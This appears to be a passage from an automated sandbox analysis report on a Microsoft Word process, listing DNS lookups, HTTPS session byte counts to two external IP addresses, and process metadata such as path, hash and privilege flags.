Aug 18, 2022 04:23:18.824484110 CEST | 192.168.2.22 | 8.8.8.8 | 0x5748 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:18.939836979 CEST | 192.168.2.22 | 8.8.8.8 | 0x5dea | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:23.852726936 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:23.885284901 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:27.740761995 CEST | 192.168.2.22 | 8.8.8.8 | 0x10d3 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:27.853646040 CEST | 192.168.2.22 | 8.8.8.8 | 0x722d | Standard query (0) | | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Aug 18, 2022 04:23:06.182066917 CEST | 8.8.8.8 | 192.168.2.22 | 0xeea0 | No error (0) | | | 35.186.245.55 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:18.931935072 CEST | 8.8.8.8 | 192.168.2.22 | 0x5748 | No error (0) | | | 34.149.204.188 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:19.049377918 CEST | 8.8.8.8 | 192.168.2.22 | 0x5dea | No error (0) | | | 34.149.204.188 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:23.871582985 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | | | 34.149.204.188 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:23.994752884 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | | | 34.149.204.188 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:27.850553036 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d3 | No error (0) | | | 34.149.204.188 | A (IP address) | IN (0x0001) |
Aug 18, 2022 04:23:27.959486961 CEST | 8.8.8.8 | 192.168.2.22 | 0x722d | No error (0) | | | 35.186.245.55 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:06 UTC | 0 | OUT | |
2022-08-18 02:23:07 UTC | 0 | IN | |
2022-08-18 02:23:07 UTC | 0 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:19 UTC | 0 | OUT | |
2022-08-18 02:23:19 UTC | 0 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49183 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:29 UTC | 17 | OUT | |
2022-08-18 02:23:29 UTC | 18 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:24 UTC | 1 | OUT | |
2022-08-18 02:23:24 UTC | 1 | IN | |
2022-08-18 02:23:24 UTC | 1 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49176 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:24 UTC | 2 | OUT | |
2022-08-18 02:23:24 UTC | 2 | IN | |
2022-08-18 02:23:24 UTC | 2 | IN | |
2022-08-18 02:23:24 UTC | 3 | IN | |
2022-08-18 02:23:24 UTC | 5 | IN | |
2022-08-18 02:23:24 UTC | 6 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49177 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:26 UTC | 8 | OUT | |
2022-08-18 02:23:26 UTC | 8 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49178 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:27 UTC | 9 | OUT | |
2022-08-18 02:23:27 UTC | 9 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49179 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:27 UTC | 9 | OUT | |
2022-08-18 02:23:27 UTC | 9 | IN | |
2022-08-18 02:23:27 UTC | 10 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49180 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:28 UTC | 10 | OUT | |
2022-08-18 02:23:28 UTC | 10 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49181 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:28 UTC | 10 | OUT | |
2022-08-18 02:23:28 UTC | 11 | IN | |
2022-08-18 02:23:28 UTC | 11 | IN | |
2022-08-18 02:23:28 UTC | 12 | IN | |
2022-08-18 02:23:28 UTC | 14 | IN | |
2022-08-18 02:23:28 UTC | 15 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49182 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:29 UTC | 17 | OUT | |
2022-08-18 02:23:29 UTC | 17 | IN | |
Target ID: | 0 |
Start time: | 04:22:15 |
Start date: | 18/08/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fd60000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |